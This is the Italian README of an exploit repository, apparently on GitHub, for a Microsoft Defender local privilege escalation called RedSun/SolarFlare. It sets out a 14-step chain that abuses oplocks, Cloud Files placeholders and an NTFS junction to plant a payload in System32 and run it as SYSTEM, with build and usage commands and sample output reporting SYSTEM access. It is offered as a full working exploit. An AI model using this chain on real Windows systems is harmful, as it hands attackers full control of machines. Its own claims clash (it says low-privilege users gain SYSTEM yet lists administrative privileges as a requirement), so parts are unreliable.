
CVE-2026-41091-PoC-Exploit Full-PoCv2
CVE-2026-41091 RedSun | Exploit LPE di Microsoft Defender. Utenti con privilegi ridotti ottengono NT AUTHORITY\SYSTEM π₯ tramite API Cloud Files + trucco junction NTFS. Costringe Defender a scrivere payload dannosi in System32 con diritti SYSTEM. β οΈ Attivamente sfruttato in natura. CVSS 7.8. Patch: Defender Engine 1.1.26040.8. π‘οΈ Solo PoC educativo.

βοΈ CVE-2026-41091 - RedSun (SolarFlare) - Exploit LPE per Microsoft Defender
VulnerabilitΓ di Link Following in Microsoft Defender - Escalation di privilegi locali a NT AUTHORITY\SYSTEM
La vulnerabilitΓ Γ¨ nota come "RedSun" π―, "SolarFlare" Γ¨ il nome che ho dato al mio exploit. β
π Panoramica
Questo repository contiene un Proof of Concept (PoC) funzionante completo per CVE-2026-41091, una vulnerabilitΓ critica di escalation di privilegi locali in Microsoft Defender (Microsoft Malware Protection Engine). Sfruttando una risoluzione impropria dei link (CWE-59), un utente malintenzionato autenticato con bassi privilegi puΓ² ottenere privilegi NT AUTHORITY\SYSTEM.
La vulnerabilitΓ , nota anche come "RedSun" o "SolarFlare", consente agli aggressori di ingannare Microsoft Defender per scrivere file arbitrari in posizioni di sistema protette con privilegi SYSTEM utilizzando l'API Cloud Files (CfAPI) e i punti di giunzione NTFS.
Nota: Questo repository include due versioni:
basic_poc.cpp- Dimostrazione semplificata dell'algoritmo (didattica)full_poc.cpp- Exploit completo funzionante con tutte le funzionalitΓ
π₯ Caratteristiche principali
| Categoria | FunzionalitΓ |
|---|---|
| Sfruttamento | β
Escalation di privilegi locali a SYSTEM β Integrazione con Cloud Files API (CfAPI) β Creazione di segnaposto cloud β Reindirizzamento tramite giunzione NTFS |
| Tecniche | β
Abuso di Batch Oplock β Rilevamento snapshot VSS β Trigger EICAR β Attivazione servizio COM |
| Target | β
Microsoft Defender < 1.1.26040.8 β Windows 10/11 β Windows Server 2019/2022 |
| UsabilitΓ | β
Logging dettagliato β Gestione errori β Nomi di directory casuali β Pulizia automatica |
π― Dettagli della vulnerabilitΓ
| Attributo | Valore |
|---|---|
| ID CVE | CVE-2026-41091 |
| Punteggio CVSS | 7.8 (Alto) |
| Vettore CVSS | AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| Vettore d'attacco | Locale |
| Privilegi richiesti | Bassi |
| Interazione utente | Nessuna |
| Impatto | Esecuzione di codice a livello SYSTEM |
| CISA KEV | β SΓ¬ (sfruttato attivamente in natura) |
| Patch disponibile | Microsoft Malware Protection Engine 1.1.26040.8 |
π¦ Prodotti interessati
| Prodotto | Versioni affette | Versioni corrette |
|---|---|---|
| Microsoft Malware Protection Engine | < 1.1.26040.8 | 1.1.26040.8+ |
| Microsoft Defender Antimalware Platform | < 4.18.26040.7 | 4.18.26040.7+ |
π¬ Catena di sfruttamento
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β CATENA DI SFRUTTAMENTO SOLARFLARE β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β β
β 1. Crea directory di lavoro β
β ββ> %TEMP%\SF-XXXX\ β
β β
β 2. Attiva Defender con EICAR β
β ββ> Scrivi EICAR rovesciato nel file esca β
β β
β 3. Attendi snapshot VSS β
β ββ> Rileva creazione di Volume Shadow Copy β
β β
β 4. Crea primo Batch Oplock β
β ββ> FSCTL_REQUEST_BATCH_OPLOCK sul file esca β
β β
β 5. Attendi rottura Oplock β
β ββ> Ottieni accesso esclusivo β
β β
β 6. Rinomina directory β
β ββ> Sposta directory originale in .tmp β
β β
β 7. Registra radice di sincronizzazione cloud β
β ββ> CfRegisterSyncRoot con API Cloud Files β
β β
β 8. Crea segnaposto cloud β
β ββ> CfCreatePlaceholders per il file esca β
β β
β 9. Crea secondo Batch Oplock β
β ββ> FSCTL_REQUEST_BATCH_OPLOCK sul segnaposto cloud β
β β
β 10. Attendi seconda rottura Oplock β
β ββ> Ottieni accesso esclusivo β
β β
β 11. Rinomina directory cloud β
β ββ> Sposta directory cloud in .cloud.tmp β
β β
β 12. Crea giunzione NTFS verso System32 β
β ββ> Reindirizza a C:\Windows\System32 β
β β
β 13. Copia payload in System32 β
β ββ> Copia file esca in System32 come TieringEngineService.exe β
β β
β 14. Attiva servizio come SYSTEM β
β ββ> CoCreateInstance(StorageTiersManagement) β
β β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
π¦ Installazione
Prerequisiti
- Windows 10/11 o Windows Server 2019/2022
- Visual Studio 2019/2022 con strumenti C++
- Privilegi amministrativi (per l'esecuzione)
Compilazione
# Clona il repository
git clone https://github.com/tc4dy/CVE-2026-41091-PoC-Exploit
cd CVE-2026-41091-PoC-Exploit
# Compila usando il Prompt dei comandi per sviluppatori di Visual Studio
cl.exe /EHsc /std:c++17 full_poc.cpp /link cfapi.lib ntdll.lib
# Oppure compila la versione base
cl.exe /EHsc /std:c++17 basic_poc.cpp /link ntdll.lib
π οΈ Utilizzo
Exploit completo (Escalation di privilegi a SYSTEM)
full_poc.exe
Dimostrazione semplice dell'algoritmo
basic_poc.exe
π Esempio di output
Output dell'exploit completo
CVE-2026-41091 SolarFlare PoC
===============================
by @tc4dy | CVSS 7.8
===============================
[*] Exploit SolarFlare avviato.
[*] Creazione directory di lavoro...
[+] Directory creata: C:\Users\user\AppData\Local\Temp\SF-8427\
[*] Attivazione Defender con EICAR...
[+] Defender attivato
[*] Attesa snapshot VSS...
[+] Snapshot VSS rilevato
[*] Creazione primo oplock...
[+] Primo oplock creato
[*] Attesa rottura oplock...
[+] Oplock acquisito
[*] Rinominazione directory...
[+] Directory rinominata
[*] Creazione secondo oplock...
[+] Secondo oplock creato
[*] Attesa secondo oplock...
[+] Secondo oplock acquisito
[*] Rinominazione directory cloud...
[+] Directory cloud rinominata
[*] Creazione giunzione NTFS verso System32...
[+] Giunzione creata
[*] Attesa che Defender finisca...
[*] Copia payload in System32...
[+] Payload copiato in C:\Windows\System32\TieringEngineService.exe
[*] Attivazione servizio Storage Tiers Management...
[+] Servizio attivato come SYSTEM
[+] Accesso SYSTEM ottenuto!
Output PoC base
CVE-2026-41091 Basic PoC
========================================
Solo dimostrazione algoritmo
========================================
[*] Avvio algoritmo exploit...
[*] Creazione directory di lavoro...
[+] Directory creata: C:\Users\user\AppData\Local\Temp\BE-3921\
[*] Attivazione Defender con EICAR...
[+] Defender attivato
[*] Attesa snapshot VSS...
[+] VSS rilevato
[*] Creazione primo oplock...
[+] Primo oplock creato
[*] Attesa rottura oplock...
[+] Oplock acquisito
[*] Rinominazione directory...
[+] Directory rinominata
[*] Creazione secondo oplock...
[+] Secondo oplock creato
[*] Attesa secondo oplock...
[+] Secondo oplock acquisito
[*] Creazione giunzione NTFS verso System32...
[+] Giunzione creata
[*] Attesa che Defender finisca...
[*] Copia payload in System32...
[+] Payload copiato in C:\Windows\System32\Payload.exe
[+] Dimostrazione algoritmo completata!
[i] Questo Γ¨ solo l'algoritmo base.
[i] Per l'escalation completa a SYSTEM,
[i] usare full_poc.cpp con Cloud API e attivazione COM.
π§ Istruzioni di compilazione
Utilizzo di Visual Studio
- Aprire il Prompt dei comandi per sviluppatori per VS 2022
- Navigare nella directory dell'exploit
- Eseguire:
# Exploit completo
cl.exe /EHsc /std:c++17 full_poc.cpp /link cfapi.lib ntdll.lib
# PoC base
cl.exe /EHsc /std:c++17 basic_poc.cpp /link ntdll.lib
Utilizzo di CMake
cmake_minimum_required(VERSION 3.10)
project(SolarFlare)
set(CMAKE_CXX_STANDARD 17)
add_executable(full_poc full_poc.cpp)
target_link_libraries(full_poc cfapi ntdll)
add_executable(basic_poc basic_poc.cpp)
target_link_libraries(basic_poc ntdll)
β οΈ Requisiti e limitazioni
| Requisito | Dettagli |
|---|---|
| SO | Windows 10/11, Server 2019/2022 |
| Privilegi | Amministrativi (per l'esecuzione) |
| Defender | Microsoft Defender deve essere abilitato |
| Internet | Necessario per il rilevamento snapshot VSS |
| Patch | Funziona solo su sistemi non aggiornati |
| Architettura | Solo x64 |
π Exploit correlati
Dai un'occhiata agli altri miei repository di exploit:
- CVE-2026-24061-PoC-Exploit - Bypass autenticazione GNU inetutils-telnetd
- CVE-2026-41940-PoC-Exploit - Bypass autenticazione cPanel/WHM
- CVE-2026-0073-PoC-Exploit - Bypass autenticazione debug wireless ADB Android